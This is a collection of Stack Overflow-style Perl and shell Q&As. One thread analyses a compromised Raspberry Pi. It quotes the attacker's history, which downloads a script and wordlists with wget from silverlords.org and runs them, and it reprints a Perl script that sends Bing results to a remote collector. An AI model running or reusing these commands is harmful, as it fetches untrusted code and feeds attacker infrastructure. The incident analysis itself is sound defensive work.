How to ask for confirmation using the command `sed` [closed] - linux

I'm trying to replace a string over multiple files using the command sed like:
grep -rl matchstring somedir/ | xargs sed -i 's/string1/string2/g'
My question is: is there a way to enable it to ask for confirmation at each substitution?
I tried adding the letter c after the g in the substitution command, but it didn't work.
Thank you in advance for any comments.

The sed utility has no confirmation facility. Unless/until one is added, consider using other tools.
The ex editor (vim in command-line mode) is very capable and supports per-change confirmation, but that mode is geared toward interactive use, and once a single change is declined the substitution stops. On the face of it, that is not what is being asked for here.
A practical solution is to use a scripting language capable of substitution and implement the confirmation logic yourself. Awk, Perl, and Python all meet those requirements.
Perl has an in-place editing option; the script can be invoked with perl -i.bak.
Security: note that the code may need additional protection against injection into the regular expression. See below.
Invoke it like this:
grep -rl matchstring somedir/ | xargs perl -i.bak sub-conf.pl 'string1' 'string2'
#! /usr/bin/perl
use strict;

my ($in_pattern, $replacement) = (shift, shift);

# Convert the string to a regexp, disabling special characters, etc.
my $pattern = quotemeta($in_pattern);

open TTY, "/dev/tty" or die "Failed to open TTY: $!";

my $eof;
# Read a line at a time into $orig
while ( my $orig = <> ) {
    my $new = $orig =~ s/$pattern/$replacement/gr;
    if ( $new ne $orig ) {
        print STDERR "Replace line ${.}:\n< ${orig}> $new";
        while (1) {
            print STDERR "(Y/N) ?";
            my $yn = <TTY>;
            unless ( defined($yn) ) { $eof = 1; last }
            if ( $yn =~ /[Yy]/ ) { print $new;  last }
            if ( $yn =~ /[Nn]/ ) { print $orig; last }
        }
    } else {
        print $orig;
    }
    die 'EOF' if $eof;
}
See How can I safely validate an untrusted regex in Perl? for an explanation of the injection protection, in case the command needs to be extended to accept a regex.
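To illustrate the quotemeta point with a minimal, self-contained sketch (the strings here are made up, and this is not part of the script above): without quotemeta, metacharacters in string1 are treated as a regular expression.
#!/usr/bin/perl
# Demonstrates why the search string is passed through quotemeta():
# '.' in a raw pattern matches any character, so 'a.b' also matches 'axb'.
use strict;
use warnings;

my $raw     = 'a.b';
my $literal = quotemeta($raw);   # becomes 'a\.b', metacharacters escaped

print "axb" =~ /$raw/     ? "raw pattern matches axb\n"    : "raw pattern: no match\n";
print "axb" =~ /$literal/ ? "quoted pattern matches axb\n" : "quoted pattern: no match\n";
Running it shows the raw pattern matching "axb" while the quoted one does not, which is the behaviour the script above relies on when string1 comes straight from the command line.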

Related

Parsing long and short args in ksh using loop

I am trying to parse arguments in ksh. I can't use getopt for this because some of my short options are two or three characters long. Currently I am using a for loop; it's clumsy, but I haven't been able to find anything better.
Question: how do I treat each option and its value as one unit while parsing?
Also, if eval set -- $options would help me, how do I use it? echoing the options does not show the expected "--" at the end. Am I assuming something wrong?
I am thinking of using a variable to keep track of when an option is found but this method seems too confusing and unnecessary.
Thanks for your time and help.
Update 1:
Adding code as requested. Thanks to markp, Andre Gelinas, and the random down-voter for making this question better. I am trying to execute the script as shown in lines 2 and 3 of the code, or with any other combination of short and long options passed together.
#!/bin/ksh
# bash script1.sh --one 123 --two 234 --three "some string"
# bash script1.sh -o 123 -t 234 -th "some string"
# the following creates problems for short options.
#options=$(getopt -o o:t:th: -l one:two:three: "--" "$@")
#Since the below `eval set -- "$options"` did not append "--" at the end
#eval set -- "$options"
for i in "$@"; do
    options="$options $i"
done
options="$options --"
# TODO capture args into variables
What I have attempted below the TODO so far:
for i in $options; do
    echo $i
done
Will be capturing the args using:
while true; do
    case $1 in
        --one|-o) shift; ONE=$1
            ;;
        --two|-t) shift; TWO=$1
            ;;
        --three|-th) shift; THREE=$1
            ;;
        --) shift; break
            ;;
    esac
done
Try something like this :
#!/bin/ksh

# Default values
ONE=123
TWO=456

# getopts configuration
USAGE="[-author?Andre Gelinas <andre.gelinas@foo.bar>]"
USAGE+="[-copyright?2018]"
USAGE+="[+NAME?TestGetOpts.sh]"
USAGE+="[+DESCRIPTION?Try out for GetOps]"
USAGE+="[o:one]#[one:=$ONE?First.]"
USAGE+="[s:second]#[second:=$TWO?Second.]"
USAGE+="[t:three]:[three?Third.]"
USAGE+=$'[+SEE ALSO?\aman\a(1), \aGetOpts\a(1)]'

while getopts "$USAGE" optchar ; do
    case $optchar in
        o) ONE=$OPTARG ;;
        s) TWO=$OPTARG ;;
        t) THREE=$OPTARG ;;
    esac
done

print "ONE = "$ONE
print "TWO = "$TWO
print "THREE = "$THREE
You can use either --one or -o. Using --man or --help also works. Note that -o and -s are numeric only, but -t will take anything. Hope this helps.
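If stepping outside ksh is an option, Perl's Getopt::Long handles long names and multi-character short aliases such as -th with its default configuration. A minimal sketch under that assumption, using the same three options and defaults (the usage text and variable names are made up):
#!/usr/bin/perl
# Sketch of the same option set using Getopt::Long; long names and
# multi-character aliases map onto the same variables.
use strict;
use warnings;
use Getopt::Long;

my ($one, $two, $three) = (123, 456, '');   # defaults, as in the ksh script

GetOptions(
    'one|o=i'    => \$one,     # --one / -o, integer
    'two|t=i'    => \$two,     # --two / -t, integer
    'three|th=s' => \$three,   # --three / -th, any string
) or die "Usage: $0 [--one N] [--two N] [--three STR]\n";

print "ONE = $one\nTWO = $two\nTHREE = $three\n";
Called as either --one 123 --three "some string" or -o 123 -th "some string", it fills the same three variables; with bundling left off (the default), a single dash followed by a full alias such as -th is accepted.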

After securing my webserver (rpi) from foreign ssh logins, I found this perl script on my computer. Can someone tell me what it does? [closed]

There was an account named "user" that was used for these logins, which came from all over the world. I spent several hours yesterday securing the computer and there have been no logins since. I awked /var/log/auth.log into a list of IPs, ordered from oldest to most recent login, in case that somehow helps:
185.145.252.26
185.145.252.36
109.236.83.3
104.167.2.4
217.23.13.125
185.38.148.238
194.88.106.146
43.225.107.70
194.88.107.163
192.162.101.217
62.112.11.88
194.63.141.141
194.88.107.162
74.222.19.247
194.88.107.164
178.137.184.237
167.114.210.108
5.196.76.41
118.70.72.25
109.236.91.85
62.112.11.222
91.195.103.172
62.112.11.94
62.112.11.90
188.27.75.73
194.88.106.197
194.88.107.165
38.84.132.236
91.197.235.11
62.112.11.79
62.112.11.223
144.76.112.21
185.8.7.144
91.230.47.91
91.230.47.92
91.195.103.189
91.230.47.89
91.230.47.90
109.236.89.72
195.228.11.82
109.236.92.184
46.175.121.38
94.177.190.188
171.251.76.179
173.212.230.79
144.217.75.30
5.141.202.235
31.207.47.36
62.112.11.86
217.23.2.183
217.23.1.87
154.122.98.44
41.47.42.128
41.242.137.33
171.232.175.131
41.114.123.190
1.54.115.72
108.170.8.185
86.121.85.122
91.197.232.103
160.0.224.69
217.23.2.77
212.83.171.102
41.145.17.243
62.112.11.81
82.79.252.36
41.114.63.134
5.56.133.126
109.120.131.106
76.68.108.151
113.20.108.27
46.246.61.20
146.185.28.52
45.32.219.199
One of the first things I did after changing the password of the "user" account was running history, which gave me this result:
1 sudo
2 sudo
3 sudo service vsftpd stop
4 su clay
5 unset PROMPT_COMMAND
6 PS1='[PEXPECT]\$'
7 wget http://xpl.silverlords.org/bing -O bing
8 wget http://www.silverlords.org/wordlist/xaaaaaaaaqb.txt -O word ; perl bing word
9 wget http://www.silverlords.org/wordlist/xaaaaaaaaiv.txt -O word ; perl bing word
10 uname
11 n
12 uname
13 history
I then ran cat /home/user/.bash_history hoping for more, but what I already had was all that was in the file.
In "user"'s home folder I found four files: bing, output.13.19.27.txt, output.16.10.38.txt, and word. All were empty except bing, which was a Perl script:
#!/usr/bin/perl
use strict;
use LWP::UserAgent;
use LWP::Simple;
use POSIX qw(strftime);

my $data = strftime "%H.%M.%S", gmtime;
my $ARGC = @ARGV;
if ($ARGC != 1) {
    printf "$0 arquivo.txt\n";
    printf "Coded by: Al3xG0 x#~\n";
    exit(1);
}
my $st = rand();
my $filename = $ARGV[0];
print "Input Filename - $filename\n";
my $max_results = 2;

open (IFH, "< $filename") or die $!;
open (OFH, "> output.${data}.txt") or die $!;

while (<IFH>) {
    next if /^ *$/;
    my $search_word = $_;
    $search_word =~ s/\n//;
    print "Results for -$search_word-\n";
    for (my $i = 0; $i < $max_results; $i += 10) {
        my $b = LWP::UserAgent->new(agent => 'Mozilla/4.8 [en] (Windows NT 6.0; U)');
        $b->timeout(30); $b->env_proxy;
        my $c = $b->get('http://www.bing.com/search?q=' . $search_word . '&first=' . $i . '&FORM=PERE')->content;
        my $check = index($c, 'sb_pagN');
        if ($check == -1) { last; }
        while (1) {
            my $n = index($c, '<h2><a href="');
            if ($n == -1) { last; }
            $c = substr($c, $n + 13);
            my $s = substr($c, 0, index($c, '"'));
            my $save = undef;
            if ($s =~ /http:\/\/([^\/]+)\//g) { $save = $s; }
            print "$save\n";
            #if ($save !~ /^ *$/) { print OFH "$save\n"; print "$save\n"};
            getprint("http://post.silverlords.org/sites.php?site=$save");
        }
    }
    print "\n";
}
close (IFH);
close (OFH);
I don't know perl, and after spending so much time with sshd config, blacklists, etc., I don't really have the time or energy to learn. If anyone could tell me what the script does and/or what the attackers were trying to do that would be great.
Thanks so much,
Clay
EDIT: I found this article that could explain the purpose of the bing search script: https://www.wired.com/2013/02/microsoft-bing-fights-botnets/
It reads the file passed on the command line and uses each line as a phrase for a Bing search. It prints the URL of every search result returned by Bing, and also sends each one to http://post.silverlords.org/sites.php?site=$save, where $save is the URL.
It used to write the same URLs to the output.HH.MM.SS.txt files, but that line has been commented out, so the files are created but left empty.
So it's just a command-line Bing search; nothing too sinister. Essentially nothing that they couldn't run on any machine that has access to Bing.
This is not an answer but merely an overlong comment about the observations I made.
When I issue the wget ... -O word commands, they work for me and I receive two files full of words. They look like lists of random words, maybe passwords for a brute-force attack:
first file: (excerpt)
kalcio
kalciolaria
kalciolariaconia2
kalciov
kalcistn
kalcit
kalcit
kalcita
...
second file: (excerpt)
curious2s
curious2saab95
curious2:saab95
curious2see
curious2see
curious2squeak2
curious2swingineverton
Curious2tender
curious2tryany2asdfg
CURIOUS2TRYIT
curious2trythre092703
...
The Perl script bing was written by someone who is not familiar with Perl. It uses beginner's style from bad tutorials, and the author obviously doesn't know the language very well.
Because he issued su clay, he apparently already knew that such a user (presumably your user) exists on that machine, without having to examine /etc/passwd or the like.
As @borodin and @melpomene say, the script searches Bing for these words, parses the resulting Bing pages for URLs, and then submits those URLs to post.silverlords.org.
As the script currently stands, it only abuses your computer's CPU and network to get its work done. The "work" is to submit Bing searches for all the words in bulk and collect the results at post.silverlords.org.

Why can't I print a very long string? [closed]

I'm writing a Perl script that searches a kml file and I need to print a very long line of latitude/longitude coordinates. The following script successfully finds the string I'm looking for, but just prints a blank line instead of the value of the string:
#!/usr/bin/perl
# Strips unsupported tags out of a QGIS-generated kml and writes a new one

$file = $ARGV[0];

# read existing kml file
open( INFO, $file );    # Open the file
@lines = <INFO>;        # Read it into an array
close(INFO);            # Close the file
#print @lines;          # Print the array

$x            = 0;
$coord_string = "<coordinates>";

# go through each line looking for above string
foreach $line (@lines) {
    $x++;
    if ( $x > 12 ) {
        if ( $line =~ $coord_string ) {
            $thisCooordString = $line;
            $var_startX       = $x;
            print "Found coord string: $thisCoordString\n";
            print " on line: $var_startX\n";
        }
    }
}
The file that it's reading is here
and this is the output I get:
-bash-4.3$ perl writekml.pl HUC8short.kml
Found coord string:
on line: 25
Found coord string:
on line: 38
Is there some cap on the maximum length that a string can be in Perl? The longest line in this file is ~151,000 characters long. I've verified that all the lines in the file are read successfully.
You've misspelled the variable name (two o's vs. three o's):
$thisCooordString = $line;
...
print "Found coord string: $thisCoordString\n";
Add use strict and use warnings to your script to prevent these sorts of errors.
Always include use strict and use warnings in EVERY perl script.
If you had done this, you would've gotten the following error message to clue you into your bug:
Global symbol "$thisCoordString" requires explicit package name
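For illustration, here is a minimal sketch (a made-up file, sharing only the variable names with the script above) that reproduces that error:
#!/usr/bin/perl
use strict;
use warnings;

my $thisCooordString = "some line";   # declared with three o's
print "Found: $thisCoordString\n";    # referenced with two o's
Under use strict this does not even compile; it aborts with the "Global symbol ... requires explicit package name" message quoted above, pointing at the misspelled line.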
Adding these pragmas and simplifying your code results in the following:
#!/usr/bin/env perl
# Strips unsupported tags out of a QGIS-generated kml and writes a new one

use strict;
use warnings;

local @ARGV = 'HUC8short.kml';

while (<>) {
    if ( $. > 12 && /<coordinates>/ ) {
        print "Found coord string: $_\n";
        print " on line: $.\n";
    }
}
You can even try Perl one-liners, as shown below:
Perl one-liner at the Windows command prompt:
perl -lne "if($_ =~ /<coordinates>/is && $. > 12) { print \"Found coord string : $_ \n\"; print \" on line : $. \n\";}" HUC8short.kml
Perl one-liner at a Unix prompt:
perl -lne 'if($_ =~ /<coordinates>/is && $. > 12) { print "Found coord string : $_ \n"; print " on line : $. \n";}' HUC8short.kml
As others have pointed out, you need to (no, you MUST) always use use strict; and use warnings;.
If you had used strict, you would have gotten an error message telling you that your variable $thisCoordString or $thisCooordString was not declared with my. Using warnings would have warned you that you're printing an undefined string.
Your whole program is written in a very old and obsolete Perl style. It is the kind of program I would have written back in the Perl 3.0 days, about two decades ago. Perl has changed quite a bit since then, and using the newer syntax will let you write programs that are easier to read and maintain.
Here's your basic program written in a more modern syntax:
#! /usr/bin/env perl
#
use strict;            # Lets you know when you misspell variable names
use warnings;          # Warns of issues (e.g. using undefined variables)
use feature qw(say);   # Lets you use 'say' instead of 'print' (no \n needed)
use autodie;           # Program automatically dies on bad file operations
use IO::File;          # Lots of nice file activity

# Make constants constant
use constant {
    COORD_STRING => qr/<coordinates>/,   # qr is a regular-expression quoted string
};

my $file = shift;

# read existing kml file
open my $fh, '<', $file;    # Three-part open with a scalar filehandle

while ( my $line = <$fh> ) {
    chomp $line;                          # Always "chomp" on read
    next unless $line =~ COORD_STRING;    # Skip non-coord lines
    say "Found coord string: $line";
    say " on line: " . $fh->input_line_number;
}
close $fh;
Many Perl developers are self-taught. There is nothing wrong with that, but many people learn Perl by looking at other people's obsolete code, reading old Perl manuals, or learning from developers who themselves picked up Perl back in the 1990s.
So get some books on Modern Perl and learn the new syntax. You might also want to learn about things like references, which can lead you to object-oriented Perl. References and OO Perl will allow you to write longer and more complex programs.

Shell Script to parse/retrieve a string found after another string/match

The shell script will be passed a string of arguments. The position of the key/value pair I am looking to parse out may change over time, i.e. it may come before or after another key at any time, so parsing between two known keys isn't an option.
I am looking to parse the domain key out of a string like this:
maxpark 0 maxsub n domain sample.foo maxlst n max_defer_fail_percentage user oli force no_cache_update 0 maxpop n maxaddon 0 locale en contactemail
The key would be "domain" and the value would be "sample.foo". The domain could have more than one '.' in it, so I need to grab the entire value.
I am not the best with regular expressions, but I imagine sed is what I'm going to need here.
I am accessing the full string using $*. If I could simply reference the key by accessing $DOMAIN, that would be great; but since my only option is to access by position, e.g. $3, and the position can change, that isn't an option.
Solved the problem using Perl.
#!/usr/bin/perl -w
use strict;

# Note: $LOCAL_IP and $PUBLIC_IP must be declared and populated elsewhere
# (or filled in here) for this to compile under strict.
my %OPTS = @ARGV;

open(FILE, "</var/named/$OPTS{'domain'}.db") || die "File not found";
my @lines = <FILE>;
close(FILE);

my @newlines;
foreach (@lines) {
    $_ =~ s/$LOCAL_IP/$PUBLIC_IP/g;
    push(@newlines, $_);
}

open(FILE, ">/var/named/$OPTS{'domain'}.db") || die "File not found";
print FILE @newlines;
close(FILE);
If you do have Perl, just use this one-liner from your shell script:
domain=$( echo $* | perl -ne '/domain\s([^\s]+)\s/ and print "$1"' )
Or if you'd rather just do it with sed:
domain=$( echo $* | sed 's/.*\<domain \([^ ]\+\).*/\1/' )
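Since the arguments are whitespace-separated key/value pairs, another option is to load them straight into a hash, which is what the Perl script above already does with %OPTS. A minimal sketch, assuming every key you care about is followed by its value (the script name getdomain.pl is made up):
#!/usr/bin/perl
# Read key/value pairs from the argument list and print the value of
# the "domain" key.
use strict;
use warnings;

# With an odd number of arguments (e.g. a trailing key with no value)
# Perl warns about the hash assignment, but the lookup still works.
my %pairs = @ARGV;
defined $pairs{domain} or die "no domain key found\n";
print "$pairs{domain}\n";
From the shell you could then capture it with something like domain=$(./getdomain.pl "$@"), which also sidesteps the word-splitting that echo $* introduces.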

Selecting surrounding lines around the missing sequence numbers [closed]

I have a file whose contents are as shown below:
TEST_4002_sample11_1_20110531.TXT
TEST_4002_sample11_2_20110531.TXT
TEST_4002_sample11_4_20110531.TXT
TEST_4002_sample11_5_20110531.TXT
TEST_4002_sample11_6_20110531.TXT
TEST_4002_sample10_1_20110531.TXT
TEST_4002_sample10_2_20110531.TXT
TEST_4002_sample10_4_20110531.TXT
TEST_4002_sample10_5_20110531.TXT
If a number in the 4th field of the file-name sequence is missing, I want to print the previous file name and the next file name as output:
TEST_4002_sample11_2_20110531.TXT
TEST_4002_sample11_4_20110531.TXT
TEST_4002_sample10_2_20110531.TXT
TEST_4002_sample10_4_20110531.TXT
This awk variant seems to produce the required output:
awk -F_ '$4>c+1{print p"\n"$0}{p=$0;c=$4}'
A simple Perl way:
perl -F_ -lane 'print "$o\n$_" if $F[3]-$n>1;$o=$_;$n=$F[3]' < file
In Perl you could do something like this:
use strict;
use warnings;

my $prev_line;
my $prev_val;

while (<>) {
    # get the 4th value
    my $val = (split '_')[3];

    # skip if invalid line
    next if !defined $val;

    # print if missed sequence
    if ( defined($prev_val) && $val > $prev_val + 1 ) {
        print $prev_line . $_;
    }

    # save for next iteration
    $prev_line = $_;
    $prev_val  = $val;
}
Save that in foo.pl and run it with something like:
cat file.txt | perl foo.pl
I'm sure it can be shortened quite a lot. Could use something like this if all lines are valid:
perl -n -e '$v=(/[^_]+/g)[3];print"$l$_"if$l&&$v>$p+1;$p=$v;$l=$_' file.txt
or
perl -naF_ -e '$v=$F[3];print"$l$_"if$l&&$v>$p+1;$p=$v;$l=$_' file.txt
As far as I understand what you need, here is a Perl script that does the job:
#!/usr/local/bin/perl
use strict;
use warnings;

my $prev = '';
my %seq1;

while (<DATA>) {
    chomp;
    my ($seq1, $seq2) = $_ =~ /^.*?(\d+)_(\d+)_\d+\.TXT$/;
    $seq1{$seq1} = $seq2 - 1 unless exists $seq1{$seq1};
    if ( $seq1{$seq1} + 1 != $seq2 ) {
        print $prev, "\n", $_, "\n";
    }
    $prev = $_;
    $seq1{$seq1} = $seq2;
}
__DATA__
TEST_4002_sample11_1_20110531.TXT
TEST_4002_sample11_2_20110531.TXT
TEST_4002_sample11_4_20110531.TXT
TEST_4002_sample11_5_20110531.TXT
TEST_4002_sample11_6_20110531.TXT
TEST_4002_sample10_1_20110531.TXT
TEST_4002_sample10_2_20110531.TXT
TEST_4002_sample10_4_20110531.TXT
TEST_4002_sample10_5_20110531.TXT
output:
TEST_4002_sample11_2_20110531.TXT
TEST_4002_sample11_4_20110531.TXT
TEST_4002_sample10_2_20110531.TXT
TEST_4002_sample10_4_20110531.TXT
I used glob to get the files (it's possible that it's as simple as <TEST_*.TXT>).
use strict;
use warnings;

my %last = ( name => '', group => '', seq => 0 );

foreach my $file (
    sort glob('TEST_[0-9][0-9][0-9][0-9]_sample[0-9][0-9]_[0-9]_*.TXT')
) {
    my ( $group, $seq ) = $file =~ m/(\d{4,}_sample\d+)_(\d+)/;
    if ( $group eq $last{group} && $seq - $last{seq} > 1 ) {
        print join( "\n", $last{name}, $file, '' );
    }
    @last{ qw<name group seq> } = ( $file, $group, $seq );
}
